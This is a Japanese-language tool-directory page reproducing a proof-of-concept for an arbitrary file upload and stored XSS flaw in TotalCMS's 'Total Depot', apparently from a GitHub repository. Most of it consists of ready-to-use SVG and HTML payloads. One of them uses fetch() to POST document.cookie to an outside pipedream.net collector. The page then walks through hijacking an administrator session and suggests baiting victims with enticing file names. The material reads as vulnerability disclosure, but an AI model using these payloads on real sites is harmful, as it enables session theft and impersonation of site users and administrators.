Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
TotalCMS-Arbitrary_File-Upload--XSS_Steal_Cookies---TotalDepot — TotalCMSは、任意のファイルアップロード - XSS脆弱性の影響を受けます。この脆弱性により、格納型クロスサイトスクリプティング(XSS Stored)が可能になり、セッションクッキーの窃取も引き起こされます。 | Kitploit
ツール/GitHubGitHub/sromanhu/totalcms-arbitrary_file-upload--xss_steal_cookies---totaldepot
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用データ流出学習と教育
GitHubsromanhu/totalcms-arbitrary_file-upload--xss_steal_cookies---totaldepot

TotalCMS-Arbitrary_File-Upload--XSS_Steal_Cookies---TotalDepot

TotalCMSは、任意のファイルアップロード - XSS脆弱性の影響を受けます。この脆弱性により、格納型クロスサイトスクリプティング(XSS Stored)が可能になり、セッションクッキーの窃取も引き起こされます。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
143年前未レビュー

TotalCMS 任意ファイルアップロード - XSS と Cookie の窃取

著者: (Sergio)

説明: TotalCMS には任意ファイルアップロード - XSS の脆弱性が存在し、クロスサイトスクリプティング (XSS) を可能にし、セッション Cookie の窃取も可能にします。

攻撃ベクトル: "Total Depot" のファイルアップロード処理の脆弱性により、非表示のアラートを仕込んだ PDF / SVG / HTML ファイルをアップロードして、クロスサイトスクリプティング (XSS) を実行し、ユーザーの Cookie を窃取することができます。


2つの PoC を実行します:

- POC 1: PDF / SVG / HTML ファイルによるクロスサイトスクリプティング (XSS)

- POC 2: ユーザーの Cookie を窃取し、外部サーバーに転送して傍受し、ユーザーになりすます。

最初の PoC から始めます:

POC 1: PDF / SVG / HTML ファイルによるクロスサイトスクリプティング (XSS)

管理パネル (https://www.totalcms.co/demo/total-cms/admin/) にログインしたら、管理サイトの "Total Depot" に移動し、非表示の XSS を仕込んだ PDF / SVG / HTML ファイルをアップロードします。

ペイロードは以下の通りです:

XSS PDF ペイロード:

これは、JS2PDFInjector ツールで生成された XSS ペイロードと、以下の内容を含む JS ペイロードです:

app.alert("XSS");

SVG ペイロード:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>

HTML ペイロード:

<html>
	<script>
		alert(document.cookie);
	</script>
</html>

image

image

アップロード後、リンクをクリックすると、ファイルが保存されているパスを確認できます:

image

ファイルのパス:

image

image

image

そして、これが3種類のファイルに対するクロスサイトスクリプティング (XSS) の結果と、ユーザーの Cookie です:

image

image

image

続いて、2つ目の PoC に進みます:

- POC 2: ユーザーの Cookie を窃取し、外部サーバーに転送して傍受し、ユーザーになりすます。

私たちはサイバー犯罪者になりすまし、ユーザーのセッション Cookie を窃取してサーバーに送信します。

このケースでは PoC としてファイルをアップロードしましたが、実際のケースでは、"NBA Tickets" のような興味を引く名前のファイルをアップロードして公開し、被害者ユーザーがそのファイルを実行した際に気づかれずに Cookie を送信させることができます。


まず最初に、外部サーバーとの通信が可能かどうかをテストします。

ペイロードは以下の通りです:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC
"-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="200"        
height="200"        
zoomAndPan="disable"        
xmlns="http://www.w3.org/2000/svg"        
xmlns:xlink="http://www.w3.org/1999/xlink"        
xml:space="preserve">
<!-- Script linked from the outside-->     
<script xlink:href="https://enbjn0l9vbowi.x.pipedream.net/" />     
<script>       
//<![CDATA[         
alert("XSS");       
]]>     
</script>   
</svg>

image

image

pipedream のリクエストで確認できるように、リクエストを正しく取得できています。


Cookie を窃取して pipedream のリクエストに送信するようにペイロードを変更し、ユーザーになりすまします。

ペイロードは以下の通りです:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC
"-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="200"        
height="200"        
zoomAndPan="disable"        
xmlns="http://www.w3.org/2000/svg"        
xmlns:xlink="http://www.w3.org/1999/xlink"        
xml:space="preserve">
<!-- Script linked from the outside-->     
<script>
  fetch('https://enbjn0l9vbowi.x.pipedream.net/', {
  method: 'POST',
  mode: 'no-cors',
  body: document.cookie
  });
</script>   
</svg>

それを実行します:


image

image

画像で確認できるように、ユーザーのセッション Cookie を正しく取得できています。


次に、ユーザーになりすまします。これをテストするために、別のブラウザで TotalCMS/admin にセッションを開き、"Cookie Editor" アドオンを開きます。

image

セッション Cookie を pipestream で取得したものに変更して保存します。

image

ウェブサイトをリロードすると、管理者ユーザーになりすますことができました。

image


追加情報:

https://www.totalcms.co/

https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html

ツールをダウンロード